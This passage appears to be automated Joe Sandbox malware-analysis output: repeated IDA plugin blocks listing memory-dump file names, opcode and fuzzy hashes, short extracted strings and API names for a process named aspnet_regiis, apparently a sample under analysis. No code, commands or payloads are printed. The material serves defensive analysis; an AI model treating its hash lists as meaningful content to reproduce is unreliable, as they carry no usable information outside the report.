                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79A1DEB5D04258CFDB208FA9DC4579EBBB1FF42700F2085A8E589AB381EB744986CF51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: LL
                                                                                                                                                                                                              • API String ID: 0-1220722286
                                                                                                                                                                                                              • Opcode ID: bcf69060ba90e5002ff7ff5d95b627e17c63985226cba5b95f6232b38f825d6d
                                                                                                                                                                                                              • Instruction ID: 45eb74ac4e1dd01ee725aeccf3e1261acc22d5965ae400a0e05ea1902b9774c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcf69060ba90e5002ff7ff5d95b627e17c63985226cba5b95f6232b38f825d6d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42A1BDB5D04259CBDB208FA9DC8579EBBB1FF42310F2085A8E549AB381EB744986CF51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Ug3e$dc
                                                                                                                                                                                                              • API String ID: 0-4184314774
                                                                                                                                                                                                              • Opcode ID: 05607615c5fdee4de33b443d3800e84dc5e7ace294bbe6f549874db81f633d78
                                                                                                                                                                                                              • Instruction ID: b01f53968b5d361c8392eb35555645776da87b386bc9521dee53fb85f8afd974
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05607615c5fdee4de33b443d3800e84dc5e7ace294bbe6f549874db81f633d78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60C116B2A083419BD711DF24CC9276BB7F2EF81B14F098428E8C69B381E378D955C796
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #8$??
                                                                                                                                                                                                              • API String ID: 0-1876940238
                                                                                                                                                                                                              • Opcode ID: dbc9046ebfd6f6c192e38a7d2eca154e9b97f4a8ebd239ab2dbe729762836633
                                                                                                                                                                                                              • Instruction ID: 9737e1e0e7373a7cc5afe4854fe83312c175d7a0135c097f83f0fa13089d3130
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbc9046ebfd6f6c192e38a7d2eca154e9b97f4a8ebd239ab2dbe729762836633
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF2105B7E267128FC304CF39CC5725ABAE26B81204F5AC53DD499DB394EB78C5058B82
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: YW$_X
                                                                                                                                                                                                              • API String ID: 0-1725867150
                                                                                                                                                                                                              • Opcode ID: 8d2f5b839b6d3368c1930d54fbe69ef9657cc543dc5cc9e4f2aae8ad128c501f
                                                                                                                                                                                                              • Instruction ID: 4a1000f540f7a51d061369b6ceb7efdafeb8d67d42846276829f34e88c52ccf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d2f5b839b6d3368c1930d54fbe69ef9657cc543dc5cc9e4f2aae8ad128c501f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F441E0B49053688FEB20CFA1D942B9EFA71FB21304F6482D9D1497B251CBB44A82CF56
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: [046
                                                                                                                                                                                                              • API String ID: 0-1840501825
                                                                                                                                                                                                              • Opcode ID: 45f22e37167838b0120aee2272d346c67ce3054e80ae6c5e290977c088cc45a9
                                                                                                                                                                                                              • Instruction ID: 385cf4f38d9b2a35c02422a253857d27a355b8ea2a79d97d66dd416954df10e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45f22e37167838b0120aee2272d346c67ce3054e80ae6c5e290977c088cc45a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3620371504B418FCB35CF39C490666BBF2BF96714B148A6DC0E78BB96DB35A00ACB94
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                              • Opcode ID: 473c7473b17c24142e2569d09840215ec00c97307c298014e73866db18646aad
                                                                                                                                                                                                              • Instruction ID: dc4b2f129e3413e3780ea0ba2af5547221392ebcb6b6d2251712ea00e6b67020
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 473c7473b17c24142e2569d09840215ec00c97307c298014e73866db18646aad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6702E471B083158FC705CF28C89075FBBE7ABC8B24F588A6DE89687381D774D9458B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(7709F5B0,00000000,00000001,7709F5A0), ref: 7707CE59
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                                              • Opcode ID: bc8a9c4f6d5e37aef8855338041dff6d2251edb98304f5f76b4fb3cab2f98e31
                                                                                                                                                                                                              • Instruction ID: 9c4cad54ca785615b78ece085a7d5226d15dfe748f7b507f56674f5bdd4a9730
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc8a9c4f6d5e37aef8855338041dff6d2251edb98304f5f76b4fb3cab2f98e31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB519DB16003049BDB219F24CC96B6773B9EF81B68F048558F986CB390F375E915C7AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: EZ[X
                                                                                                                                                                                                              • API String ID: 2994545307-3495592236
                                                                                                                                                                                                              • Opcode ID: ff2346a586084b9ffbe2d24df50c24b1ab6926a9bed68b561e81349c0e28474e
                                                                                                                                                                                                              • Instruction ID: d8b373261144c2545db3b9be9fcd3a2d0ac7249dd4c9a2a43a9b46a0b9203dcb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff2346a586084b9ffbe2d24df50c24b1ab6926a9bed68b561e81349c0e28474e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A491DE316483129FC715CF28C980A2EB7F2BF89B14F15893CE99657365DB31E821DB86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: EZ[X
                                                                                                                                                                                                              • API String ID: 2994545307-3495592236
                                                                                                                                                                                                              • Opcode ID: 6f661813253707489e4b7735460adb34985741172f12ac613268b2aba6c7454f
                                                                                                                                                                                                              • Instruction ID: 3ef30a189069902651b71f05d08c678525a006b2520f3388572a02af0b0a3851
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f661813253707489e4b7735460adb34985741172f12ac613268b2aba6c7454f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E281AC356483019FC705CF28C984A6AB7F2EFE9B10F15852CE9828B365DB31E821DB46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: {~
                                                                                                                                                                                                              • API String ID: 0-2649281568
                                                                                                                                                                                                              • Opcode ID: fc089ae2dc3291c1e5097b33abb77985f76b8fce66c99d74e34be26136660599
                                                                                                                                                                                                              • Instruction ID: d02642077ed8c2a8f45df5e7d5a53e9c0f72acf955e90b62564cebe037ba4058
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc089ae2dc3291c1e5097b33abb77985f76b8fce66c99d74e34be26136660599
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8161F0B55083408FD3149F24D89266BBBF2FF82754F048A2DE4C68B391E7798A05CB97
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                              • API String ID: 0-411688564
                                                                                                                                                                                                              • Opcode ID: f02038f303b96d61b8a5cc7771b4de69643f9c82a18a20b699ec8fd2bfe3cd1f
                                                                                                                                                                                                              • Instruction ID: 830fbc6d25c788381a5cb93cc0b937fc09557efa948f0973e90eb9e176f05ebf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f02038f303b96d61b8a5cc7771b4de69643f9c82a18a20b699ec8fd2bfe3cd1f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80718D7660C3958FD325CF24984079FBBE1BBC5704F114A2DE8A56B281D7B49A0ACBC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ^
                                                                                                                                                                                                              • API String ID: 0-1590793086
                                                                                                                                                                                                              • Opcode ID: 08c5cec38371e5ea7781353440c5c3925b7d696a567c16a7a271c677c3369f9e
                                                                                                                                                                                                              • Instruction ID: 7de76d5a17a6728d013f2d5b26a6d158d6a5d4961a509dcf69d939b41e0de07a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08c5cec38371e5ea7781353440c5c3925b7d696a567c16a7a271c677c3369f9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F02421D0C3204AE300CE66C18138FFAE6AB92304F008A3CD9C1AB281D2AD894547CF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 801ded67916972357f14c4496bb69896268ec1f7ffad3f68bb82d13eaca3a63c
                                                                                                                                                                                                              • Instruction ID: 6acc8366b356d75c26a74062be50309d496099581ecfba94e80f653c14b70d5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 801ded67916972357f14c4496bb69896268ec1f7ffad3f68bb82d13eaca3a63c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A742FF36A1A652CFC304CF39C49122AB7F2EB8A328F1B897DD99687341D735E855CB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0c1e803eb4d39bf26d68d2b906bb3ea8cbc290603c7631b12a8064a9e5d21979
                                                                                                                                                                                                              • Instruction ID: 28e0f87c1daaec62180ccaecf78b09d84041fd3c77d2c9759dba4218d7c17712
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c1e803eb4d39bf26d68d2b906bb3ea8cbc290603c7631b12a8064a9e5d21979
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6252D0316183118BC315DF28D8986AAB3F2FFC4B14F25992DD996C7285E734E951CB82
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 22aa56f2bfb019e8bd86ce3be7304d4ff977db8e8a2cfad41b0fdd15fbfa605d
                                                                                                                                                                                                              • Instruction ID: c1510c22a4f93de15000d02ee5cbdb0193bd0c563668f0c7d819ad62b2cc1611
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22aa56f2bfb019e8bd86ce3be7304d4ff977db8e8a2cfad41b0fdd15fbfa605d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F012EF36A1A752CFC304CF39C49161AB7F2ABCA328F1A897DD99687391D735E805CB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8578ae04b4b23af1aa05573d7be6200a4de52d80918221f7aa8197fe3e5bce82
                                                                                                                                                                                                              • Instruction ID: d6128bb7aad1ee1e43fee13e9a8a3f110832468ccdc6f435b0de8f77e9e1c331
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8578ae04b4b23af1aa05573d7be6200a4de52d80918221f7aa8197fe3e5bce82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C402EF36619352CFC304CF39C89162BB7F2ABCA328F1A897DE49687381D635D906CB45
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3a547c5e89335c44f235c09542fb4e0260a049577a02e4cc07d023e1c428217f
                                                                                                                                                                                                              • Instruction ID: dcc3b9c21eaa6f853159cb0a873ffbd57ebbb5fc2d0b9483501f203ff7ea7c4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a547c5e89335c44f235c09542fb4e0260a049577a02e4cc07d023e1c428217f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFE113B1505B408FD7218F35C892763BBF5FF86704F19496DE8868BB82E739A405CB92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: dedb19ac7b50d4eb989cc034b223a754cba750049a788dd5fc9a384eef8702a9
                                                                                                                                                                                                              • Instruction ID: e317378a776fc4869d669ccdc664004278553e56701a6cafb9ac004be1e7cde1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dedb19ac7b50d4eb989cc034b223a754cba750049a788dd5fc9a384eef8702a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E10576608381CFD305CF79D89076EBBE2AB96714F188A6CF4E18B392D7748544CB52
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
